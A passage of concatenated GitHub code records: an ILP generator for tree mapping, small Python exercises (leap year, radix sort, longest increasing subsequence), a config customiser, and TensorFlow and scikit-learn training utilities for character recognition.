int(mapping[node].label)\n return newmap\n\ndef addcolumn(var, coeff, eqname, coldict):\n entry = \" \" + var + \"\\t\" + eqname + '\\t' + str(coeff)\n if var in coldict:\n coldict[var].append(entry)\n else:\n coldict[var] = [entry]\n\ndef addrhs(eqname, val, rhs):\n rhs.append(\" RHS1\\t\" + eqname + '\\t' + str(val))\n\ndef namevar(varname, ids):\n out = varname\n for i in ids:\n out += \"_\" + str(i)\n return out\n\ndef createEqns(h, g, hrep, grep, mapping, distmat, eqns='ALL'):\n eqnames = []\n rhs = []\n coldict = {}\n\n #COST\n eqnames.append(\" N COST\")\n\n for u in g.traverse():\n if u.children == []:\n addcolumn(namevar(\"X\", [u.label, u.label]), 2, \"COST\", coldict)\n else:\n addcolumn(namevar(\"X\", [u.label, u.label]), 4, \"COST\", coldict)\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), distmat[i][j]-1, \"COST\", coldict)\n addcolumn(namevar(\"Y\", [u.label, w.label, i, j]), distmat[i][j]-1, \"COST\", coldict)\n for k in range(1,6):\n #c = -1.5\n c = -2\n coeff = c * ((k - 1.) / k)\n addcolumn(namevar(\"T\", [u.label, k]), coeff, \"COST\", coldict)\n\n #(0.0) - Mapping Equalities\n if eqns == \"ALL\" or 0 in eqns:\n eqcounter = 0\n for u in mapping:\n for i in range(len(hrep)):\n varname = namevar(\"M\", [u, i])\n eqname = \"INVAR\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n if mapping[u] == i:\n addrhs(eqname, 1, rhs)\n else:\n addrhs(eqname, 0, rhs)\n addcolumn(varname, 1, eqname, coldict)\n\n #(0.1) - Duplication Invariants\n if eqns == \"ALL\" or 0 in eqns:\n eqcounter = 0\n for u in g:\n assert u.children == []\n varname = namevar(\"X\", [u.label, u.label])\n eqname = \"DUP_INVAR\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(varname, 1, eqname, coldict)\n\n #(2)\n if eqns == \"ALL\" or 2 in eqns:\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n if hrep[i][j] == 0:\n\n parent = namevar(\"M\", [u.label, i])\n child1 = namevar(\"M\", [v.label, j])\n\n eqname = \"MAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n addcolumn(parent, 1, eqname, coldict)\n addcolumn(child1, 1, eqname, coldict)\n\n child2 = namevar(\"M\", [w.label, j])\n\n eqname = \"MAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n addcolumn(parent, 1, eqname, coldict)\n addcolumn(child2, 1, eqname, coldict)\n\n #(3)\n if eqns == \"ALL\" or 3 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"SMAP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n for i in range(len(hrep)):\n addcolumn(namevar(\"Z\", [u, v, i]), -1, eqname, coldict)\n\n #(4)\n if eqns == \"ALL\" or 4 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n for i in range(len(hrep)):\n\n #4.1\n eqname = \"SAMEMAP\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n\n addrhs(eqname, -1, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u, i]), -1, eqname, coldict)\n addcolumn(namevar(\"M\", [v, i]), -1, eqname, coldict)\n\n #4.2\n eqname = \"SAMEUI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u,i]), -1, eqname, coldict)\n\n #4.3\n eqname = \"SAMEVI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Z\", [u, v, i]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [v, i]), -1, eqname, coldict)\n\n eqcounter += 1\n\n #(5)\n if eqns == \"ALL\" or 5 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"NOANC\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1 - grep[u][v], rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n\n eqcounter += 1\n\n #(6)\n if eqns == \"ALL\" or 6 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v1 in range(len(grep)):\n if u == v1:\n continue\n for v2 in range(v1 + 1, len(grep)):\n if grep[v1][v2] + grep[v2][v1] == 0:\n continue\n eqname = \"LARGEDUP\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1, rhs)\n addcolumn(namevar(\"X\", [u, v1]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [u, v2]), 1, eqname, coldict)\n\n eqcounter += 1\n\n #(7)\n if eqns == \"ALL\" or 7 in eqns:\n eqcounter = 0\n\n def do6(u, v, a, b, eqcounter):\n if grep[u][a] * grep[v][b] == 0 and grep[a][u] * grep[v][b] == 0:\n return eqcounter\n eqname = \"DUPCROSS\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [a, b]), 1, eqname, coldict)\n\n return eqcounter + 1\n\n for u in range(len(grep)):\n for v in range(u+1, len(grep)):\n for a in range(v+1, len(grep)):\n for b in range(a+1, len(grep)):\n eqcounter = do6(u,v,a,b,eqcounter)\n eqcounter = do6(u,a,v,b,eqcounter)\n eqcounter = do6(u,b,a,v,eqcounter)\n\n\n #(9)\n if eqns == \"ALL\" or 9 in eqns:\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v,w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n eqname = \"DUP\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n eqcounter += 1\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u.label, u.label]), 1, eqname, coldict)\n coeff = (hrep[i][j] + hrep[j][i]) / -2.0\n varname = namevar(\"Y\", [v.label, w.label, i, j])\n addcolumn(varname, coeff, eqname, coldict)\n\n #(10)\n if eqns == \"ALL\" or 10 in eqns:\n\n def do9(u, v, i, j, eqcounter):\n\n #9.1\n eqname = \"DUPAND\" + str(eqcounter)\n eqnames.append(\" G \" + eqname)\n\n addrhs(eqname, -1, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u.label, i]), -1, eqname, coldict)\n addcolumn(namevar(\"M\", [v.label, j]), -1, eqname, coldict)\n\n #9.2\n eqname = \"DUPUI\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [u.label, i]), -1, eqname, coldict)\n\n #9.3\n eqname = \"DUPVJ\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"Y\", [u.label, v.label, i, j]), 1, eqname, coldict)\n addcolumn(namevar(\"M\", [v.label, j]), -1, eqname, coldict)\n\n return eqcounter + 1\n\n eqcounter = 0\n for u in g.traverse():\n if u.children == []:\n continue\n v, w = u.children\n for i in range(len(hrep)):\n for j in range(len(hrep)):\n eqcounter = do9(u, v, i, j, eqcounter)\n eqcounter = do9(u, w, i, j, eqcounter)\n eqcounter = do9(v, w, i, j, eqcounter)\n eqcounter = do9(w, v, i, j, eqcounter)\n\n #(11)\n if eqns == \"ALL\" or 11 in eqns:\n eqcounter = 0\n for i in range(len(grep)):\n eqname = \"UMAP\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n eqcounter += 1\n addrhs(eqname, 1, rhs)\n for j in range(len(hrep)):\n addcolumn(namevar(\"M\", [i, j]), 1, eqname, coldict)\n\n #(12)\n if eqns == \"ALL\" or 12 in eqns:\n eqcounter = 0\n for u in range(len(grep)):\n for v in range(len(grep)):\n if u == v:\n continue\n eqname = \"TDMAX\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [u, u]), -1, eqname, coldict)\n\n eqname = \"TDEQUAL\" + str(eqcounter)\n eqnames.append(\" E \" + eqname)\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"X\", [u, v]), 1, eqname, coldict)\n addcolumn(namevar(\"X\", [v, u]), -1, eqname, coldict)\n\n eqcounter += 1\n\n #(13)\n if eqns == \"ALL\" or 13 in eqns:\n\n eqcounter = 0\n #(13.1)\n for u in range(len(grep)):\n eqname = \"TDSIZE\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 1, rhs)\n for k in range(1,6):\n addcolumn(namevar(\"T\", [u, k]), 1, eqname, coldict)\n eqcounter += 1\n\n #(13.2)\n eqcounter = 0\n for u in range(len(grep)):\n for k in range(1,6):\n eqname = \"TDLEQ\" + str(eqcounter)\n eqnames.append(\" L \" + eqname)\n addrhs(eqname, 0, rhs)\n addcolumn(namevar(\"T\", [u, k]), 1, eqname, coldict)\n for v in range(len(grep)):\n addcolumn(namevar(\"X\", [u, v]), -1./k, eqname, coldict)\n eqcounter += 1\n\n\n return eqnames, rhs, coldict\n\ndef write(filename, eqnames, rhs, coldict):\n f = open(filename, 'w')\n f.write(\"NAME TREESOLVE\\nROWS\\n\")\n\n for line in eqnames:\n f.write(line + '\\n')\n\n f.write(\"COLUMNS\\n MARK0000\\t'MARKER'\\t'INTORG'\\n\")\n for var in sorted(coldict.keys()):\n for stmt in coldict[var]:\n f.write(stmt +'\\n')\n f.write(\" MARK0000\\t'MARKER'\\t'INTEND'\\n\")\n\n f.write(\"RHS\\n\")\n for line in rhs:\n f.write(line + '\\n')\n\n f.write(\"ENDATA\")\n f.close()\n\ndef extractMapping(m, host, guest):\n \"\"\"\n Extracts a mapping from model m. Can only be called after m.optimize().\n Assumes mapping is stored in M_X_Y variables, finds those that are set to 1.\n\n Args:\n m (gurobipy model): The model object containin the ILP solution\n \n Outputs:\n mapping (dict): guest -> host mapping of all nodes in the guest tree\n \"\"\"\n labelMapping = {}\n for item in m.getVars():\n if item.x == 1 and item.varName[0] == 'M':\n vals = item.varName.split(\"_\")\n labelMapping[vals[1]] = vals[2]\n\n labelToHost = {}\n for node in host.traverse():\n labelToHost[node.label] = node\n\n mapping = {}\n for node in guest.traverse():\n hnode = labelToHost[labelMapping[node.label]]\n mapping[node] = hnode\n\n return mapping\n","repo_name":"Singh-Lab/treeSim","sub_path":"ilp_generator.py","file_name":"ilp_generator.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70283519111","text":"\"\"\"\nFaça um programa que leia um ano (valor inteiro) e imprima se ele é bissexto ou não.\nObservação: um ano é bissexto se ele é múltiplo de 400, ou se ele é múltiplo de 4 mas não\né múltiplo de 100.\n\"\"\"\n\nano = int(input(\"Digite o ano: \"))\n\nif (ano % 400 == 0) or (ano % 4 == 0 and ano % 100 != 0):\n print(\"\\nO ano e bissexto\")\nelse:\n print(\"\\nO ano nao e bissexto\")","repo_name":"enzoeferreira/MC102","sub_path":"Listas/1_08.py","file_name":"1_08.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18451291761","text":"def Dfs(pos, ans):\n if (len(pre[pos]) == 0):\n # print(ans)\n if (len(ans) == maxn):\n # print(ans)\n anss.append(tuple(ans))\n return\n for i in pre[pos]:\n ans.append(i)\n Dfs(i, ans)\n ans.pop()\n\na = list(map(int, input().split()))\nm = int(input())\nn = len(a)\ndp = [1 for i in range(n)]\npre = [[] for i in range(n)]\nmaxn = 0\nfor i in range(n):\n for j in range(i):\n if (a[j] < a[i]):\n dp[i] = max(dp[i], dp[j] + 1)\n # pre[i].append(j)\n maxn = max(maxn, dp[i])\n for j in range(i):\n if (a[j] < a[i] and dp[j] + 1 == dp[i]):\n pre[i].append(j)\nprint(maxn)\nanss = []\nfor i in range(n - 1, -1, -1):\n p = i\n ans = [i]\n Dfs(p, ans)\nanss.sort(reverse = True)\nansss = []\nfor i in anss:\n ansss.append(list(i))\nfor i in range(len(ansss)):\n ansss[i].reverse()\nfor i in range(min(len(ansss), m)):\n for j in range(len(ansss[i])):\n print(ansss[i][j] + 1, end = ' ' if j != maxn - 1 else '\\n')\nif (len(ansss) < m):\n print(\"Can't find more\")\n","repo_name":"hello-world2005/course","sub_path":"学校/信息技术/XJCS/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"16145221909","text":"import speech_recognition as sr\n\nr = sr.Recognizer()\naudio_file = sr.AudioFile(\"Vatterode_Kunstscheune_Kaschuba.wav\")\n\nwith audio_file as source:\n r.adjust_for_ambient_noise(source)\n audio = r.record(source, 10)\n text = r.recognize_google(audio, language=\"de\")\n print(text)\n\n\n","repo_name":"MarcTheSpark/bkp","sub_path":"Python/old/speech_analyze.py","file_name":"speech_analyze.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72892440072","text":"\"\"\"\nЗадача 32: Определить индексы элементов массива (списка),\nзначения которых принадлежат заданному диапазону (т.е. не\nменьше заданного минимума и не больше заданного\nмаксимума)\n\"\"\"\n\n\nminimum = int(input('Введите минимум: '))\nmaximum = int(input('Введите максимум: '))\nn = int(input('Введите длинну массива: '))\narray = []\nresult = []\n\nfor i in range(0, n - 1):\n\tarray.append(int(input('Введите число: ')))\n\nprint('Исходный массив - ', array)\n\nfor index, value in enumerate(array):\n\tif value >= minimum and value <= maximum: \n\t\tresult.append(index)\n\n\nprint('Результат - ', result)\n","repo_name":"Altirius/learning-python","sub_path":"6_занятие/32/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19564572466","text":"import datetime\nimport time\n\n\nfilename = 'covid.txt'\nrefresh_time = '23:00:00'\nwith open(filename, \"r\") as file:\n first_line = file.readline()\n \n\n \ndate_time_str = first_line # previous data loading time\nprint ( \"date_time_str\"+date_time_str)\ndate_time_str = date_time_str.replace(\"\\n\",'')\nformat = \"%b %d %Y at %I:%M%p\"\n\nstart_time = datetime.datetime.now().strftime(format)\nend_time = datetime.datetime.strptime(date_time_str,format)\nprint('start time:' + start_time )\nprint('end time:' + str(end_time))\n\ntotal_time= datetime.datetime.strptime(start_time,format) - datetime.datetime.strptime(date_time_str,format)\n\n\n\nprint (total_time)\nif total_time.days >= 1:\n print (\"Time to refresh\")\n \nelse:\n print (\"comparing hours....\")\n if ',' in str(total_time):\n t = (str(total_time).split(',')[1]).replace(' ','')\n t1 = datetime.datetime.strptime(t, '%H:%M:%S')\n print (t)\n else :\n t = str(total_time)\n t1 = datetime.datetime.strptime(t, '%H:%M:%S')\n \n t2 = datetime.datetime.strptime(refresh_time, '%H:%M:%S')\n \n \n if t1.time() > t2.time():\n print (\"Its time to refresh\")\n else:\n print (\"Hang in there\")\n \n \n\n\n\n","repo_name":"Pradnya1208/Desktop_notification_tkinter_plyer","sub_path":"timeDiff.py","file_name":"timeDiff.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29533292648","text":"import preprocessing\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport argparse\nfrom datetime import datetime\nimport sklearn\n\n\nclass Classifier:\n def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n \"\"\"Defining the model.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.input = tf.placeholder(tf.float32, [None, img_h, img_w, 1])\n\n self.conv1 = slim.conv2d(\n self.input,\n num_outputs=32, kernel_size=[3, 8],\n stride=[1, 1], padding='Valid',\n scope=self.scope+'_conv1'\n )\n self.conv2 = slim.conv2d(\n self.conv1,\n num_outputs=64, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv2'\n )\n self.conv3 = slim.conv2d(\n self.conv2,\n num_outputs=128, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv3'\n )\n self.pool = slim.max_pool2d(self.conv3, [2, 2])\n\n self.hidden = slim.fully_connected(\n slim.flatten(self.pool),\n 512,\n scope=self.scope+'_hidden',\n activation_fn=tf.nn.relu\n )\n self.classes = slim.fully_connected(\n tf.nn.dropout(self.hidden, self.dropout_keep_prob),\n self.n_classes,\n scope=self.scope+'_fc',\n activation_fn=None\n )\n\n self.targets = tf.placeholder(tf.int32, [None])\n self.targets_onehot = tf.one_hot(self.targets, self.n_classes)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=self.targets_onehot,\n logits=self.classes\n ))\n self.train_step = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(self.loss)\n\n\nclass FineTuningClassifier:\n def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n \"\"\"Defining the model for fine tuning.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.input = tf.placeholder(tf.float32, [None, img_h, img_w, 1])\n\n self.conv1 = slim.conv2d(\n self.input,\n num_outputs=32, kernel_size=[3, 8],\n stride=[1, 1], padding='Valid',\n scope=self.scope+'_conv1'\n )\n self.conv2 = slim.conv2d(\n self.conv1,\n num_outputs=64, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv2'\n )\n self.conv3 = slim.conv2d(\n self.conv2,\n num_outputs=128, kernel_size=[5, 5],\n stride=[2, 2], padding='Valid',\n scope=self.scope+'_conv3'\n )\n self.pool = slim.max_pool2d(self.conv3, [2, 2])\n\n hidden_layer = tf.layers.Dense(\n 512,\n activation=tf.nn.relu)\n self.hidden = hidden_layer(slim.flatten(self.pool), scope=self.scope+'_hidden')\n classes_layer = tf.layers.Dense(\n self.n_classes,\n activation=None)\n self.classes = classes_layer(tf.nn.dropout(self.hidden, self.dropout_keep_prob), scope=self.scope+'_fc')\n\n self.targets = tf.placeholder(tf.int32, [None])\n self.targets_onehot = tf.one_hot(self.targets, self.n_classes)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=self.targets_onehot,\n logits=self.classes\n ))\n self.train_step = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(\n self.loss,\n var_list=[hidden_layer.variables, classes_layer.variables]\n )\n\n\nclass FineTuningClassifierBis:\n def __init__(self, scope, img_w, img_h, n_classes, dropout_keep_prob=1.0, learning_rate=1e-3):\n \"\"\"Defining the model for fine tuning.\"\"\"\n\n self.scope = scope\n self.n_classes = n_classes\n self.dropout_keep_prob = dropout_keep_prob\n\n self.model = tf.keras.Sequential()\n\n self.input = tf.keras.Input(dtype=tf.float32, shape=(None, img_h, img_w, 1))\n\n conv1_layer = tf.layers.Conv2D(filters=32, kernel_size=[3, 8], stride=[1, 1], padding='valid')\n self.model.add(conv1_layer)\n\n conv2_layer = tf.layers.Conv2D(filters=64, kernel_size=[5, 5], stride=[2, 2], padding='valid')\n self.model.add(conv2_layer)\n\n conv3_layer = tf.layers.Conv2D(filters=128, kernel_size=[5, 5], stride=[2, 2], padding='valid')\n self.model.add(conv3_layer)\n\n pool = tf.layers.MaxPooling2D(pool_size=[2, 2], strides=[2,2], padding='valid')\n self.model.add(pool)\n\n self.model.add(tf.layers.Flatten())\n hidden_layer = tf.layers.Dense(units=512, activation=tf.nn.relu)\n self.model.add(hidden_layer)\n\n self.model.add(tf.layers.Dropout(rate=self.dropout_keep_prob))\n classes_layer = tf.layers.Dense(units=self.n_classes, activation=None)\n self.model.add(classes_layer)\n\n self.model.layers.conv1_layer.trainable = False\n self.model.layers.conv2_layer.trainable = False\n self.model.layers.conv3_layer.trainable = False\n\n self.model.compile(optimizer=tf.optimizers.RMSprop(learning_rate=learning_rate),\n loss=tf.nn.softmax_cross_entropy_with_logits_v2)\n\n\ndef train(model_name, training_dataset, validation_dataset, train_steps=5e5, pretrained=None, fine_tuning=False,\n learning_rate=1e-3):\n if fine_tuning and pretrained is None:\n raise ValueError(\"if fine_tuning is True, you must provide a pretrained model.\")\n\n img_h, img_w = 64, 64\n batch_size = 10\n start = datetime.now()\n best_acc = 0\n best_loss = np.infty\n\n if fine_tuning:\n nn = FineTuningClassifier('classifier', img_w, img_h, len(preprocessing.CLASSES), dropout_keep_prob=0.8,\n learning_rate=learning_rate)\n\n # thanks to https://github.com/KranthiGV/Pretrained-Show-and-Tell-model/issues/7#issuecomment-309862894\n vars_to_rename = {\n \"lstm/basic_lstm_cell/weights\": \"lstm/basic_lstm_cell/kernel\",\n \"lstm/basic_lstm_cell/biases\": \"lstm/basic_lstm_cell/bias\",\n }\n new_checkpoint_vars = {}\n reader = tf.train.NewCheckpointReader(pretrained)\n for old_name in reader.get_variable_to_shape_map():\n if old_name in vars_to_rename:\n new_name = vars_to_rename[old_name]\n else:\n new_name = old_name\n new_checkpoint_vars[new_name] = tf.Variable(reader.get_tensor(old_name))\n print(\"new checkpoint vars:\", new_checkpoint_vars)\n else:\n nn = Classifier('classifier', img_w, img_h, len(preprocessing.CLASSES), dropout_keep_prob=0.8,\n learning_rate=learning_rate)\n\n dataset = list(map(lambda f: f.strip(),\n open(training_dataset, 'r').readlines()))\n validation_dataset = list(map(lambda f: f.strip(),\n open(validation_dataset, 'r').readlines()))\n\n with tf.Session() as sess:\n \n init = tf.global_variables_initializer()\n sess.run(init)\n if fine_tuning:\n saver_loader = tf.train.Saver(new_checkpoint_vars)\n else:\n saver_loader = tf.train.Saver()\n saver = tf.train.Saver(max_to_keep=3)\n best_acc_saver = tf.train.Saver(max_to_keep=100)\n best_loss_saver = tf.train.Saver(max_to_keep=100)\n summary_writer = tf.summary.FileWriter('summaries/'+model_name)\n\n # todo debug\n # saver.export_meta_graph(\"saver2.txt\", as_text=True)\n # quit(-1)\n\n if pretrained is not None:\n saver_loader.restore(sess, pretrained)\n print(\"pretrained model loaded\")\n\n for t in range(train_steps):\n \n # perform training step\n images, labels = preprocessing.get_batch(dataset, batch_size, (img_h, img_w))\n loss, _ = sess.run([nn.loss, nn.train_step], feed_dict={\n nn.input: images,\n nn.targets: labels\n })\n\n # show and save training status\n if t % 10000 == 0:\n print(\"save\")\n saver.save(sess, 'saves/step_'+model_name, global_step=t)\n\n summary = tf.Summary()\n summary.value.add(tag='Loss', simple_value=float(loss))\n if t % 100 == 0:\n # testing model on validation set occasionally\n images, labels = preprocessing.get_batch(\n validation_dataset, 100, (img_h, img_w))\n classes = sess.run(nn.classes, feed_dict={nn.input: images})\n predictions = np.argmax(classes, -1)\n\n val_err = float(sum(predictions != labels))\n summary.value.add(tag='ValidationError', simple_value=val_err)\n\n val_acc = sklearn.metrics.accuracy_score(labels, predictions)\n summary.value.add(tag='ValidationAccuracy', simple_value=val_acc)\n\n delta = datetime.now() - start\n print(f\"step {t}/{train_steps}, loss: {loss}, valErr: {val_err}, valAcc: {val_acc}, elapsed time: {delta}\")\n\n if val_acc > best_acc:\n best_acc_saver.save(sess, f'saves/best_acc_{model_name}_{best_acc}', global_step=t)\n best_acc = val_acc\n print(\"new val acc\", best_acc)\n\n if loss < best_loss:\n best_loss_saver.save(sess, f'saves/best_loss_{model_name}_{best_loss}', global_step=t)\n best_loss = loss\n print(\"new loss\", best_loss)\n\n summary_writer.add_summary(summary, t)\n summary_writer.flush()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', type=str, required=True, help='Training dataset name')\n parser.add_argument('-v', type=str, required=True, help='Validation dataset name')\n parser.add_argument('-m', type=str, required=True, help='Model name')\n parser.add_argument('-i', type=int, help='Training steps (iterations)')\n parser.add_argument('-l', type=float, help='Learning rate')\n parser.add_argument('-f', action='store_true', help='Perform fine-tuning')\n parser.add_argument('-p', type=str, help='Pretrained model')\n\n opt = parser.parse_args()\n\n # es: python train.py -t datasplits/good_train -v datasplits/good_validation -m finetuning\n # -i 1e6+1 -l 5e-5 -f -p models/top_fnt\n train(opt.m, opt.t, opt.v, train_steps=opt.i, pretrained=opt.p, fine_tuning=opt.f, learning_rate=opt.l)\n","repo_name":"GioFic95/UAV-object-detection","sub_path":"afc/chars_rec/chars74k-master/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"42712178299","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n\"\"\"\nThis is used by otter docker container to customize otter's config based on env\nvariables. Pass in a sample config file to it.\n\"\"\"\n\nimport json\nimport os\nimport sys\n\nconf = json.load(open(sys.argv[1]))\nconf[\"url_root\"] = os.environ[\"URL_ROOT\"]\nconf[\"identity\"][\"url\"] = os.environ[\"IDENTITY_URL\"]\nconf[\"identity\"][\"admin_url\"] = os.environ[\"IDENTITY_URL\"]\nconf[\"cassandra\"][\"seed_hosts\"] = os.environ[\"CASS_HOSTS\"].split(\",\")\nconf[\"zookeeper\"][\"hosts\"] = os.environ[\"ZK_HOSTS\"]\ndel conf[\"cloudfeeds\"]\ndel conf[\"cloud_client\"]\nconf[\"converger\"][\"interval\"] = 10\nconf[\"converger\"][\"build_timeout\"] = 30\nconf[\"selfheal\"][\"interval\"] = 20\n\nprint(json.dumps(conf, indent=2))\n","repo_name":"rackerlabs/otter","sub_path":"scripts/cust_conf.py","file_name":"cust_conf.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"10458908832","text":"\"\"\"Implementation of the radix sort algorithm\"\"\"\n\nfrom typing import List\n\n# possible pitfalls\n # convert number back to number data type in get_digit\n # return a number data type in get_digit\n\ndef get_digit(number: int, place: int):\n \"\"\"Returns digit from the number at a given place\"\"\"\n # get_digit(12345, 0) returns 5\n number_str = str(number)\n if place >= len(number_str):\n return 0\n reversed_str: str = \"\"\n i: int = len(number_str) - 1\n while i >= 0:\n reversed_str += number_str[i]\n i -= 1\n return reversed_str[place]\n \ndef digit_count(number: int):\n \"\"\"Returns the length of an integer number\"\"\"\n return len(str(number))\n\ndef most_digits(numbers: List[int]):\n \"\"\"Returns the number of digits in the largest numbers in the list\"\"\"\n most_numbers_length = 0\n for number in numbers:\n current_count = digit_count(number)\n if current_count > most_numbers_length:\n most_numbers_length = current_count\n return most_numbers_length\n\ndef radix_sort(lst: List[int]):\n \"\"\"Sorts a list of positive integer values using the radix sort algorithm\"\"\"\n largest_range = most_digits(lst)\n for i in range(0, largest_range):\n buckets = [[] for i in range(0, 10)]\n for number in lst:\n current_digit = int(get_digit(number, i)) ## 3221 - 1\n buckets[current_digit].append(number)\n lst = [element for sublist in buckets for element in sublist]\n return lst\n","repo_name":"codeme254/data-structures-and-algorithms-in-python","sub_path":"0x0D-radix_sort/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32021123008","text":"from typing import Any, List\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn import metrics\n\nfrom utils.ml_logging import get_logger\n\n# Set up logging\nlogger = get_logger()\n\n\ndef make_confusion_matrix(model, X_test, y_actual, labels=[1, 0]):\n \"\"\"\n Generate confusion matrix for the fitted model.\n\n Parameters:\n model (Model): Classifier to predict values of X_test.\n X_test (array): Test set.\n y_actual (array): Ground truth.\n labels (list): List of labels to create confusion matrix.\n\n Returns:\n None\n \"\"\"\n y_predict = model.predict(X_test)\n cm = metrics.confusion_matrix(y_actual, y_predict, labels=labels)\n df_cm = pd.DataFrame(\n cm,\n index=[f\"Actual - {label}\" for label in labels],\n columns=[f\"Predicted - {label}\" for label in labels],\n )\n group_counts = [\"{0:0.0f}\".format(value) for value in cm.flatten()]\n group_percentages = [\"{0:.2%}\".format(value) for value in cm.flatten() / np.sum(cm)]\n labels = [f\"{v1}\\n{v2}\" for v1, v2 in zip(group_counts, group_percentages)]\n labels = np.asarray(labels).reshape(2, 2)\n plt.figure(figsize=(10, 7))\n sns.heatmap(df_cm, annot=labels, fmt=\"\")\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n\n\ndef get_metrics_score(\n model: Any,\n X_train: np.ndarray,\n y_train: np.ndarray,\n X_test: np.ndarray,\n y_test: np.ndarray,\n log_scores: bool 